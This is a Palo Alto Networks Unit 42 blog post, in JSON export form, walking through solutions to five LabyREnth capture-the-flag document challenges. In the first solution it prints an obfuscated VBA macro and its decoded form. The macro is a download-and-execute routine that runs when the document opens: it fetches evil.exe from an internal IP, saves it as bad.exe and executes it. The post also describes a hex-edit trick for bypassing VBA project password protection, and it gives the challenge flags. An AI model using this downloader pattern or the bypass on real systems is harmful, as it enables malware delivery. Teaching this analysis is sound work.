{"id":17284,"date":"2016-08-18T13:00:20","date_gmt":"2016-08-18T20:00:20","guid":{"rendered":"https:\/\/www.paloaltonetworks.com\/blog\/?p=17284"},"modified":"2016-08-18T13:06:23","modified_gmt":"2016-08-18T20:06:23","slug":"labyrenth-capture-the-flag-ctf-document-track-solutions","status":"publish","type":"post","link":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/2016\/08\/labyrenth-capture-the-flag-ctf-document-track-solutions\/","title":{"rendered":"LabyREnth Capture the Flag (CTF): Document Track Solutions"},"content":{"rendered":"

Thanks to the incredibly talented community of threat researchers that participated in LabyREnth, the Unit 42 Capture the Flag (CTF)<\/a> challenge. Now that the challenge is closed, we can finally reveal the solutions of each challenge track. We\u2019ll be rolling out the solutions for one challenge track per week. First up, the Document track.<\/p>\n

<\/p>\n

Document 1 Challenge: Maaa, why you clickz such macro?<\/h3>\n

Challenge Created By: Tyler Halfpop <\/em>@0xtyh<\/em><\/a><\/p>\n

When we open the document, we see this image that is commonly found in a lot of document malware. We also have a prompt on top to enable macros.<\/p>\n

\"Untitled1\"<\/span><\/div><\/a><\/p>\n

If we enable macros and have a tool like FakeNet running, then we get the following output:<\/p>\n

\"Untitled2\"<\/span><\/div><\/a><\/p>\n

This looks interesting, it is trying to download an evil.exe from an RFC 1918 internal IP address 10.1.133.7. We can look at the macros using the macro viewer in Word or by dumping them with a tool like olevba from decalge<\/a>.<\/p>\n

Private Function QklkhFEQNB(HGKuttPaRM As Variant, UBvkWqzieX As Integer)\r\nDim gsFEVmmIzO, vSHOfSrEta As String, dHLdiEqdts, eUTAbMoUIA\r\nvSHOfSrEta = ActiveDocument.Variables(\"ppKzr\").Value()\r\ngsFEVmmIzO = \"\"\r\ndHLdiEqdts = 1\r\nWhile dHLdiEqdts < UBound(HGKuttPaRM) + 2\r\neUTAbMoUIA = dHLdiEqdts Mod Len(vSHOfSrEta): If eUTAbMoUIA = 0 Then eUTAbMoUIA = Len(vSHOfSrEta)\r\ngsFEVmmIzO = gsFEVmmIzO + Chr(Asc(Mid(vSHOfSrEta, eUTAbMoUIA + UBvkWqzieX, 1)) Xor CInt(HGKuttPaRM(dHLdiEqdts - 1)))\r\ndHLdiEqdts = dHLdiEqdts + 1\r\nWend\r\nQklkhFEQNB = gsFEVmmIzO\r\nEnd Function\r\nPublic Function BkAIuNwQNDkohBY()\r\ntwOvwCSTPL = QklkhFEQNB(Array(5, 5, 27, 65, 89, 98, 85, 86, 71, 75, 66, 92, 95, 98, 67, 64, 89, 83, 84, 95, 26, _\r\n78, 116, 78, 91, 5, 116, 32, 72, 2, 33, 48, 10, 29, 61, 8, 37, 20, 63, 44, 1, _\r\n12, 62, 38, 47, 52, 99, 57, 5, 121, 89, 37, 65, 32, 32, 11, 98, 42, 58, 32, 28, _\r\n9, 3, 117, 85, 4, 57, 10, 94, 0, 16, 8, 28, 42, 30, 121, 71, 6, 8, 9, 37, _\r\n2, 23, 34, 21, 120, 54, 7, 40, 35, 75, 50, 87, 3, 55, 47, 99, 52, 13, 0, 42, _\r\n30, 27, 126, 59, 3, 123, 29, 52, 44, 53, 29, 15, 50, 12, 35, 8, 48, 89, 54, 27, _\r\n62, 28, 8, 36, 49, 119, 104, 14, 5, 64, 34, 43, 22, 71, 5, 46, 7, 66, 42, 0, _\r\n1, 113, 97, 83, 31, 45, 95, 111, 31, 40, 51), 24)\r\nUkIWIEtqCF = QklkhFEQNB(Array(42, 115, 2), 188)\r\nDim xHttp: Set xHttp = CreateObject(QklkhFEQNB(Array(116, 7, 6, 74, 60, 43, 42, 36, 64, 70, 110, 27, 28, 12, 12, 17, 23), 0))\r\nDim bStrm: Set bStrm = CreateObject(QklkhFEQNB(Array(15, 32, 32, 53, 35, 89, 22, 25, 65, 53, 51, 26), 176))\r\nxHttp.Open UkIWIEtqCF, twOvwCSTPL, False\r\nxHttp.Send\r\nWith bStrm\r\n.Type = 1\r\n.Open\r\n.write xHttp.responseBody\r\n.savetofile QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17), 2\r\nEnd With\r\nShell (QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17))\r\nEnd Function\r\nPrivate Sub Document_Open()\r\nIf ActiveDocument.Variables(\"ppKzr\").Value <> \"toto\" Then\r\nBkAIuNwQNDkohBY\r\nActiveDocument.Variables(\"ppKzr\").Value = \"toto\"\r\nIf ActiveDocument.ReadOnly = False Then\r\nActiveDocument.Save\r\nEnd If\r\nEnd If\r\nEnd Sub\r\n<\/pre>\n
As we can see, this code has its strings encoded and is obfuscated, and when we clean it up, it\u2019s pretty simple:<\/p>\n
Public Function Beacon()\r\nx = \"http:\/\/10.1.33.7\/b64\/x58\/MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=\/evil.exe\"\r\ny = \"GET\"\r\nDim xHttp: Set xHttp = CreateObject(\"Microsoft.XMLHTTP\")\r\nDim bStrm: Set bStrm = CreateObject(\"Adodb.Stream\")\r\nxHttp.Open y, x, False\r\nxHttp.Send\r\nWith bStrm\r\n    .Type = 1\r\n        .Open\r\n            .write xHttp.responseBody\r\n                .savetofile \"bad.exe\", 2\r\n                End With\r\n                Shell (\"bad.exe\")\r\n                End Function\r\n\r\n<\/pre>\n
Now we can see this matches what we saw in FakeNet. It looks like the URL that it\u2019s looking up is in base64. If we decode it, we get:<\/p>\n
>>> base64.b64decode(\"MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=\")\r\n'081916230e3102313a696b07683634216a2c30682b6b070f3068071336682f072f306b2a6b6a3468683325'\r\n<\/pre>\n
This looks like an ascii hex string, but if we convert it to bytes, we don\u2019t get anything interesting. However, the URI also includes another single byte (we assume since it starts with x) of x58. If we try decoding the hex string with that byte, we get the key. Here is an example Python script to print the key from the URI.<\/p>\n
 <\/p>\n
a = \u201c\u201d\r\ns = \"MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=\".decode('base64')\r\nfor i, x in zip(s[0::2], s[1::2]):\r\n          a+=chr(int(str(i+x), 16)^0x58)\r\nprint a\r\n\r\nPAN{ViZib13_0nly2th0s3_Wh0_Kn0w_wh3r32l00k}\r\n<\/pre>\n
Document 2 Challenge: Can you crack doc?<\/h3>\n
Challenge Created By: Tyler Halfpop <\/em>@0xtyh<\/em><\/a><\/p>\n
For this challenge, we\u2019re provided a file named \u201cCrackDoc.doc\u201d and when we open it, we\u2019re presented with a \u2018UsersForm1\u2019 prompt for \u2018Key\u2019 value.<\/p>\n
\"Untitled3\"<\/span><\/div><\/a><\/p>\n
Typing in the wrong key displays a message \u201cU can do. Try harder\u2026\u201d accompanied by a sweet picture of doge.<\/p>\n
\"Untitled4\"<\/span><\/div><\/a><\/p>\n
If we attempt to look at the underlying macros, we can see that the VBProject is password protected.<\/p>\n
\"Untitled4\"<\/span><\/div><\/a><\/p>\n
To circumvent this, we\u2019ll simply load the document up in our favorite hex editor and modify the string \u2018DPB=\u201d\u2019 to \u2018DPX=\u201d\u2019.<\/p>\n
\"Untitled5\"<\/span><\/div><\/a><\/p>\n
We\u2019ve now corrupted the document so that when we re-open the file and it parses this string, it will find it to be an invalid key. However, it still allows us to load the project, thus bypassing the protection \u2018DPB\u2019 provided.<\/p>\n
\"Untitled6\"<\/span><\/div><\/a><\/p>\n
Once inside the project, you can go into the \u2018Project Properties\u2019 and uncheck \u2018Lock project for viewing\u2019 under the \u2018Protection\u2019 tab to remove the password permanently.<\/p>\n
Looking at the code, we have a form called \u2018UserForm1\u2019 and a module called \u2018NewMacros\u2019. If we right click on the form and go to \u2018View Code\u2019, we see the underlying macro we\u2019re interested in and immediately see a byte-array for the key.<\/p>\n
\"Untitled7\"<\/span><\/div><\/a><\/p>\n
We can see that if X equals the string of bytes, then we get our win message. The value X is derived from the \u2018suchcrypto\u2019 function being passed our input and the IV \u2018General Vidal\u2019. The function doesn\u2019t look particularly difficult to reverse.<\/p>\n
\"Untitled8\"<\/span><\/div><\/a><\/p>\n
But I opted to take an even lazier route to beat this challenge. I decided to fight macro with macro. By creating an array of potential values and passing each of them to the \u2018suchcrypto\u2019 function, I am able to easily enumerate what the key is and when I find a matching value, move on to the next.<\/p>\n
By using the full array and Notepad++, I record a small macro of hitting the up arrow a few times and deleting the last byte, before copying and pasting the result then doing it again. What I\u2019m left with is a long list of \u2018For\u2019 loops that I can copy into the \u2018UserForm()\u2019 macro.<\/p>\n
Starting with:<\/p>\n
\"Untitled9\"<\/span><\/div><\/a><\/p>\n
Ending with:<\/p>\n
\"Untitled10\"<\/span><\/div><\/a><\/p>\n
Now we just hit enter a few times and watch the key unwind itself for us!<\/p>\n
\"Untitled11\"<\/span><\/div><\/a><\/p>\n

\n<\/a>
\"Untitled12\"<\/span><\/div><\/a><\/p>\n

\n<\/a>PAN{L4$t_Night_@f@iry_Vizited_M3}<\/strong><\/p>\n
Document 3 Challenge: Adobe, pls<\/h3>\n
Challenge Created By: Curtis Carmony <\/em>@c1fe<\/em><\/a><\/p>\n
I started out debugging the extracted javascript. I was feeling pretty clever when I found the decoded YouTube URL until Rick Astley started singing that he was never going to give me up. Nice Rick Roll Curtis! I hope it got some of you out there as well.<\/p>\n
\"Untitled13\"<\/span><\/div><\/a><\/p>\n
Next, I went through the different streams in Cerbero profiler and saw the JS tag with hex in the first object.<\/p>\n
\"Untitled14\"<\/span><\/div><\/a><\/p>\n
I put that into a hex editor and then tested the key to complete the challenge.<\/p>\n
\"Untitled15\"<\/span><\/div><\/a><\/p>\n
\"Untitled16\"<\/span><\/div><\/a><\/p>\n
Document 4 Challenge: Macros are fun.<\/h3>\n
Challenge Created By: Curtis Carmony <\/em>@c1fe<\/em><\/a><\/p>\n
For this challenge, we\u2019re provided a file \u201cfun.docm\u201d, with the extension implying that we\u2019ll be having (no)fun with macros!<\/p>\n
After opening the document, we\u2019re presented with the text \u201cMORE MACROS = MORE FUN\u201d in large color-changing font with a lovely air-horn sound that plays on repeat. Attempting to open the VB Project reveals that it\u2019s password protected, so we\u2019ll need to bypass this first.<\/p>\n
\"Untitled17\"<\/span><\/div><\/a><\/p>\n
As the new format for Doc files are archives, we\u2019ll open it up in 7z and look for the \u2018vbaProject.bin\u2019 file under the \u2018\\word\\\u2019 directory. Open this up in a hex editor and search for the string \u2018DPB=\u201d\u2019 then simply change it to something like \u2018DPX=\u201d\u2019 and save the file. When you load the file now you\u2019ll receive an error about the project containing an invalid key with an option to continue loading it anyway. Now you\u2019ll be able to access the VB Project and can go into the Project Properties and unselect \u2018Lock project for viewing\u2019 to remove the password protection.<\/p>\n
\"Untitled18\"<\/span><\/div><\/a><\/p>\n
Looking at the project, we can see that there are two forms, \u2018NpuXrzgq\u2019 and \u2018U8pblvDZuAh8Gy\u2019, along with one module \u2018Z1yiWeP\u2019. Looking at the code in the main document and the module, it looks like there are a lot of functions so we\u2019ll start by debugging it and get a feel for what it\u2019s trying to do. Putting a \u2018Stop\u2019 after the initial \u2018Document_Open()\u2019 function starts the process.<\/p>\n
\"Untitled19\"<\/span><\/div><\/a><\/p>\n
Before even getting into the meat of the macro we can see we may have a problem as it\u2019s checking if there are four \u2018VBcomponents\u2019 when we only have three. Stepping through the \u2018zkceuV405Q5LjUp587OYxTI7OR9zTyPdvz8k\u2019 function, we find this to be the series of events that decode the embedded WAV file and continuously play the air-horn while changing the text in the document.<\/p>\n
If we adjust the code so it doesn\u2019t fail the first check, we follow the macro to \u2018XiqyXdC809pP5esSrC633ag92w0x6otQylY0\u2019 function, which immediately calls \u2018zoycqKJvqznJMeMpHe7Z61xYJfLLmbObxBVy\u2019 and then begins to enumerate the function names.<\/p>\n
\"Untitled20\"<\/span><\/div><\/a><\/p>\n
The function \u2018BqNFmKCS7cTPv9XNFOd2mCLrdqCfmdNm6HBz\u2019 begins a process of base-64 decoding the function name and then modifying the byte-values based on various fields of the document.<\/p>\n
\"Untitled21\"<\/span><\/div><\/a><\/p>\n
Both of the functions are one-byte XoR\u2019s, 44 and 32 respectively, which then get compared to the base-64 decoded value of \u2018U8pblvDZuAh8GY.Label1.Caption\u2019, which is \u2018xRgWTqWr7ipEjFBfESrOiaYFu9i9Jml3Q171\u2019.<\/p>\n
\"Untitled21\"<\/span><\/div><\/a><\/p>\n
Based on this, we can grab all of the function names and quickly determine the match by base64 decoding each and XoR\u2019ing the bytes by 44 and 32.<\/p>\n
>>> a = base64.b64decode(\"yRQaQqmn4iZIgFxTHSbChaoJt9SxKmV7T1L5\")\r\n>>> b = base64.b64decode(\"xRgWTqWr7ipEjFBfESrOiaYFu9i9Jml3Q171\")\r\n>>> b\r\n'\\xc5\\x18\\x16N\\xa5\\xab\\xee*D\\x8cP_\\x11*\\xce\\x89\\xa6\\x05\\xbb\\xd8\\xbd&iwC^\\xf5'\r\n>>> c = \"\"\r\n>>> for i in a:\r\n...     c += chr(ord(i) ^ 44 ^ 32)\r\n...\r\n>>> c\r\n'\\xc5\\x18\\x16N\\xa5\\xab\\xee*D\\x8cP_\\x11*\\xce\\x89\\xa6\\x05\\xbb\\xd8\\xbd&iwC^\\xf5'\r\n<\/pre>\n
Now that we have our interesting function name, we can force the macro to use this value and continue debugging it.<\/p>\n
Back in the \u2018XiqyXdC809pP5esSrC633ag92w0x6otQylY0\u2019 function, it will take another function name, \u2018d7KRoSK5UEDh35jJNkj0TtcJjOIbmBZlyCql\u2019 and pass it along with our matching name to another function, which base64 decodes \u2018d7KRoSK5UEDh35jJNkj0TtcJjOIbmBZlyCql\u2019 into an array before sending us to function \u2018XWn5TNdoykQb0QoitVEG7sLOxIRSi97XmqmM\u2019 which has a \u2018MsgBox\u2019 call, presumably to print our flag!<\/p>\n
Looking at the function we can see there are a few more XoR and comparison checks against property values for the forms within the VBProject.<\/p>\n
\"Untitled22\"<\/span><\/div><\/a><\/p>\n
\"Untitled23\"<\/span><\/div><\/a><\/p>\n
At this point it XoR\u2019s the \u2018d7KRoSK5UEDh35jJNkj0TtcJjOIbmBZlyCql\u2019 function name by 144 and 85, takes the result of that and XoR\u2019s it against the base-64 decoded value of \u2018XJCR\/DogZt7bduvvusJgAQu6QX9DmtKN+bZB\u2019 to see if they match\u2026which they won\u2019t.<\/p>\n
Since we know two parts of the puzzle, we can just work backwards to figure out what the initial second function name should be and go from there. We\u2019ll base-64 decode the \u2018XJCR\u2019 string and \u2018yRQa\u2019 string, XoR them together, then XoR each resulting byte by 144 and 85.<\/p>\n
>>> a = base64.b64decode(\"yRQaQqmn4iZIgFxTHSbChaoJt9SxKmV7T1L5\")\r\n>>> b = base64.b64decode(\"XJCR\/DogZt7bduvvusJgAQu6QX9DmtKN+bZB\")\r\n>>> c = \"\"\r\n>>> for index,value in enumerate(a):\r\n...     c += chr((ord(value) ^ ord(b[index])) ^ 144 ^ 85)\r\n...\r\n>>> c\r\n'PAN{VBA=V3ryb!gAdv3n7ur3s!}'\r\n<\/pre>\n
Document 5 Challenge: EXCEL.EXE not just CALC.EXE<\/h3>\n
Challenge Created By: Curtis Carmony <\/em>@c1fe<\/em><\/a><\/p>\n
We are given an Excel document that has a Crackme. When we try to test a key, a cheeky popup appears, tells us we are wrong, closes Excel, and launches calc.exe.<\/p>\n
\"Untitled24\"<\/span><\/div><\/a><\/p>\n
When we open the document back up and look at the macros there is only one very simple macro to close the document, so there are definitely some shenanigans.<\/p>\n
Sub excelulate()\r\n\r\n   Application.Quit\r\n\r\nEnd Sub<\/pre>\n
 <\/p>\n
If we right click on the sheets on the bottom and click unhide there is a secret hidden sheet.<\/p>\n
\"Untitled24\"<\/span><\/div><\/a><\/p>\n
 <\/p>\n
If we go to the secret sheet, click \u201cShow Formulas\u201d and make the font black then we can see there are Excel functions in the cells. There is one cell that looks interesting at A14 that is referring to a super secret sheet that we cannot see.<\/p>\n
\"Untitled25\"<\/span><\/div><\/a><\/p>\n
I modified the macro to try and make all of the sheets visible and clicked the button.<\/p>\n
Sub excelulate()\r\nDim x As Worksheet\r\nFor Each x In Sheets\r\n    x.Visible = True\r\nNext\r\nEnd Sub\r\n<\/pre>\n
We can now see a super secret sheet with more formulas. It is pretty amazing that there can be hidden and then super hidden sheets in Excel.<\/p>\n
\"Untitled26\"<\/span><\/div><\/a><\/p>\n
If we remove uncheck \u201cShow Formulas\u201d and remove everything from F13 besides the concatenate function, Excel will print the formula for us.<\/p>\n
=CONCATENATE(D7,A5,C5,B4,E20,B6,A8,B8,A12,B10,E10,C9,B13,D12,C11,B16,A25,A18,B19,C20,B21,B2,D23,B24,E4,B26,D16,A21,C14,A16)<\/p>\n
\"Untitled27\"<\/span><\/div><\/a><\/p>\n
If we enter that key into the original file we get the winning message and find that we are the EXCELULATOR! It is pretty amazing all the things you can do with Excel.<\/p>\n
\"Untitled28\"<\/span><\/div><\/a><\/p>\n
Leave a comment below to share your thoughts about these challenges. Be sure to also check out how other threat researchers solved these challenges:<\/p>\n
Document 1 Challenge<\/h3>\n